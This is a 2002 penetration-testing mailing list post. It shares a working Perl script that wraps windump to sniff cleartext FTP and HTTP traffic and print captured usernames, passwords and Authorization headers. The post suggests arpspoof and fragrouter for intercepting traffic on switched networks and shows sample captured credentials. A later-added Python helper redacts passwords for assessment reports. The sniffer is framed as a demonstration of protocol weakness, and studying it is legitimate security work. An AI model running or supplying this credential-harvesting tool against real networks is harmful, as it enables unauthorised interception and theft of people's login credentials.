Penetration Testing mailing list archives

Perl Script wrapper for Windump


From: "Susan Chan Lee" <susan.lee () securityassoc com>
Date: Thu, 28 Feb 16:36:05 2002 +0000

Hi
 
Just thought this Perl script may be useful to you all.
 
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for best results. 
 
Thanks
 
Susan Chan Lee
Security Associates - Singapore
 
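#!/usr/bin/perl
# Author: Susan Lee
# email: susan.lee () securityassoc com
# File: sort.pl
# Usage: perl sort.pl
 
$LIMIT = shift || 25000;    # stop after this many packets (first argument)
 
$|=1;                       # unbuffered output
open (STDIN,"windump -lnx -s 1024 dst port 80 or 8080 or 8088 or 21 |")
    or die "cannot run windump: $!";
while (<>) {
    if (/^\S/) {
        # A non-indented line is the header of the next packet.
        last unless $LIMIT--;
        # Print the matching lines of the packet collected so far.
        while ($packet=~/(USER|PASS|GET|POST|WWW-Authenticate|Authorization).+/g) {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        # Only track PUSH segments that carry data (length > 0).
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    s/\s+//;                               # strip the first run of whitespace (the dump's indent)
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;    # turn hex pairs into characters
    tr/\x1F-\x7E\r\n//cd;                  # delete everything except 0x1F-0x7E, CR and LF
    $packet .= $_;
}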
 
# End of Script
 
Readme File:
 
Tested successfully using ActiveState Perl
(http://www.activestate.com).
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been 
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for best results.
 
Sort.pl builds on a script written by Lincoln Stein. This script is a
port to Windows and makes some other modifications. 
 
This script is really a wrapper around the Windump program, which needs
to be installed and configured on your system for this script to work
(http://netgroup-serv.polito.it/windump/). sort.pl assumes windump is
in your system path. If your system has multiple interfaces
(including dial-up interfaces), then you'll need to tell windump
which interface to listen on via the -i X command, where X is
the number of the interface, and edit the script appropriately (line
8). Use the windump -D command to see all interfaces on your system.
 
An example is given below:
 
C:\Temp\ps>perl sort.pl
windump: listening on\Device\Packet_{1443C46F-E2B6-404F-9588-BB555B2E3764}
172.1.3.130 -> 172.1.4.231      USER root
172.1.3.130 -> 172.1.4.231      PASS london
172.1.3.130 -> 10.168.13.1     GET http://packetstormsecurity.nl/images/ps.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET http://packetstormsecurity.nl/images/spacer.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET http://packetstormsecurity.nl/images/go.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET http://packetstormsecurity.nl/images/search.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET http://packetstormsecurity.nl/images/bg_area2.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1     GET http://packetstormsecurity.nl/images/top.gif HTTP/1.1
493 packets received by filter
0 packets dropped by kernel
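
A reporting aid for output in the format shown above, added here as an example and not part of the original post or of sort.pl: it groups cleartext FTP and HTTP Basic credential exposures by client/server pair and redacts the passwords, so the finding can go into an assessment report without the secrets. The function names and the Basic header in the sample (alice:s3cret) are invented for illustration.

```python
import base64
import binascii
import re

# Output format of sort.pl: "<client> -> <server><whitespace><matched text>"
LINE = re.compile(r"^(\d+(?:\.\d+){3}) -> (\d+(?:\.\d+){3})\s+(.+)$")

def redact(payload):
    """Return (kind, safe_text) for a credential-bearing payload, else None."""
    m = re.match(r"PASS\s+(.*)", payload)
    if m:
        return "ftp-password", "PASS <redacted>"
    m = re.match(r"USER\s+(\S+)", payload)
    if m:
        return "ftp-user", "USER " + m.group(1)
    m = re.match(r"Authorization:\s*Basic\s+(\S+)", payload, re.I)
    if m:
        try:
            # Basic auth is only base64("user:password"); keep the user name.
            raw = base64.b64decode(m.group(1), validate=True)
            user = raw.decode("latin-1").split(":", 1)[0]
        except (binascii.Error, ValueError):
            user = "<undecodable>"
        return "http-basic", "Authorization: Basic <redacted> (user=%s)" % user
    return None

def summarize(lines):
    """Group credential exposures by (client, server); drop everything else."""
    findings = {}
    for line in lines:
        m = LINE.match(line.rstrip("\r\n"))
        hit = m and redact(m.group(3))
        if hit:
            findings.setdefault((m.group(1), m.group(2)), []).append(hit)
    return findings

# Constructed sample: the first three lines follow the post's example output,
# the Basic header is an invented value (alice:s3cret).
SAMPLE = [
    "172.1.3.130 -> 172.1.4.231\tUSER root",
    "172.1.3.130 -> 172.1.4.231\tPASS london",
    "172.1.3.130 -> 10.168.13.1\tGET http://packetstormsecurity.nl/images/ps.gif HTTP/1.1",
    "172.1.3.130 -> 10.168.13.1\tAuthorization: Basic "
    + base64.b64encode(b"alice:s3cret").decode(),
]

if __name__ == "__main__":
    for (client, server), hits in summarize(SAMPLE).items():
        for kind, text in hits:
            print("%s -> %s\t[%s] %s" % (client, server, kind, text))
```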
 

